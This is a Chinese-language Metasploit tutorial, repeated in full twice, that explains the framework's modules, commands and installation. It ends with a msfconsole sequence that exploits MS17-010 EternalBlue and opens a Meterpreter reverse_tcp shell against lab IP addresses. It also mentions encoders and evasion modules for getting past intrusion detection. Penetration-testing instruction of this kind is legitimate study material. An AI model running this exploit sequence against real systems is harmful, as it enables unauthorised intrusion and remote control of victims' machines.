MSF Metasploit Framework
介绍说明
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为MSF团队一直都在努力开发各种攻击工具,并将它们贡献给所有MSF用户。MSF的设计初衷是打造成一个攻击工具开发平台,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
目录介绍
1.auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。
2.encoders:编码工具,用于躲过入侵检测和过滤系统。
3.exploit:主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如: use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)
4.nops:由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x90…)会因为被拦截二导致攻击时效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到。如打开php的NOPS生成脚本,就会发现它返回了指定长度的空格。
5.payload:攻击载荷,是攻击者发送给系统执行的指令的。payload主要是在目标机执行的,exploits是在本地执行作用于目标机。命名规则:系统/类型/名称,比如:use payload/windows/shell/bind_tcp
6.post:该目录存放exploits执行成功后,向目标机发送的一些功能性指令,如:提权、获取hash等。
7.evasion:新加入的免杀对抗模块。
相关命令
1、msfconsole
2、show exploits:显示所有的攻击模块
3、show auxiliary:显示所有的辅助模块
4、show payloads:显示当前模块可用回连管道
5、show options:显示该模块所需设置的攻击参数
6、show targets:查看模块支持的攻击目标
7、search命令可以用来检索所需要的模块的一些信息
8、use <模块名称> 使用该模块(攻击模块或辅助模块)
9、options:显示需要配置的信息
10、set和unsetset payload<载荷名称>使用该攻击载荷
11、 save 使用save命令对设置的参数进行保存, 在下次启动后可以直接使用
12、 run和exploit 实施攻击
一、windows安装MSF
windows下载地址:
https://windows.metasploit/ /
MSF全部模块都在这个目录下
设置环境变量
计算机-属性-高级系统设置-环境变量-系统变量(path)
之后就可以打开cmd
窗口输入msfconsole
即可
二、centos7安装MSF
在vps(centos7)安装MSF的时候踩了很多坑,我踩的坑就不让大家踩了,直接按照本文内容安装即可。
官方提供的一键化安装脚本:(推荐)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
直接一条命令安装即可,在VPS
上可能需要多执行几次该命令。
如何更新到最新版的MSF?
只能先卸载原来的MSF,然后重新下载安装即可
卸载方法:
rpm -e metasploit-framework
三、简单使用(MS17010)
MS17010利用过程分析:
1.选择攻击模块
2.设置Payload载荷(监听协议)
3.设置攻击模块参数
4.执行run或exploit
可以搜关键词或者CVE编号都是OK的
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块
set payload windows/x64/meterpreter/reverse_tcp //设置监听协议
set rhost 192.168.46.142 //目标地址
set lhost 192.168.46.131 //本地地址
exploit
MSF Metasploit Framework
介绍说明
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为MSF团队一直都在努力开发各种攻击工具,并将它们贡献给所有MSF用户。MSF的设计初衷是打造成一个攻击工具开发平台,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
目录介绍
1.auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。
2.encoders:编码工具,用于躲过入侵检测和过滤系统。
3.exploit:主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如: use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)
4.nops:由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x90…)会因为被拦截二导致攻击时效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到。如打开php的NOPS生成脚本,就会发现它返回了指定长度的空格。
5.payload:攻击载荷,是攻击者发送给系统执行的指令的。payload主要是在目标机执行的,exploits是在本地执行作用于目标机。命名规则:系统/类型/名称,比如:use payload/windows/shell/bind_tcp
6.post:该目录存放exploits执行成功后,向目标机发送的一些功能性指令,如:提权、获取hash等。
7.evasion:新加入的免杀对抗模块。
相关命令
1、msfconsole
2、show exploits:显示所有的攻击模块
3、show auxiliary:显示所有的辅助模块
4、show payloads:显示当前模块可用回连管道
5、show options:显示该模块所需设置的攻击参数
6、show targets:查看模块支持的攻击目标
7、search命令可以用来检索所需要的模块的一些信息
8、use <模块名称> 使用该模块(攻击模块或辅助模块)
9、options:显示需要配置的信息
10、set和unsetset payload<载荷名称>使用该攻击载荷
11、 save 使用save命令对设置的参数进行保存, 在下次启动后可以直接使用
12、 run和exploit 实施攻击
一、windows安装MSF
windows下载地址:
https://windows.metasploit/ /
MSF全部模块都在这个目录下
设置环境变量
计算机-属性-高级系统设置-环境变量-系统变量(path)
之后就可以打开cmd
窗口输入msfconsole
即可
二、centos7安装MSF
在vps(centos7)安装MSF的时候踩了很多坑,我踩的坑就不让大家踩了,直接按照本文内容安装即可。
官方提供的一键化安装脚本:(推荐)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
直接一条命令安装即可,在VPS
上可能需要多执行几次该命令。
如何更新到最新版的MSF?
只能先卸载原来的MSF,然后重新下载安装即可
卸载方法:
rpm -e metasploit-framework
三、简单使用(MS17010)
MS17010利用过程分析:
1.选择攻击模块
2.设置Payload载荷(监听协议)
3.设置攻击模块参数
4.执行run或exploit
可以搜关键词或者CVE编号都是OK的
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块
set payload windows/x64/meterpreter/reverse_tcp //设置监听协议
set rhost 192.168.46.142 //目标地址
set lhost 192.168.46.131 //本地地址
exploit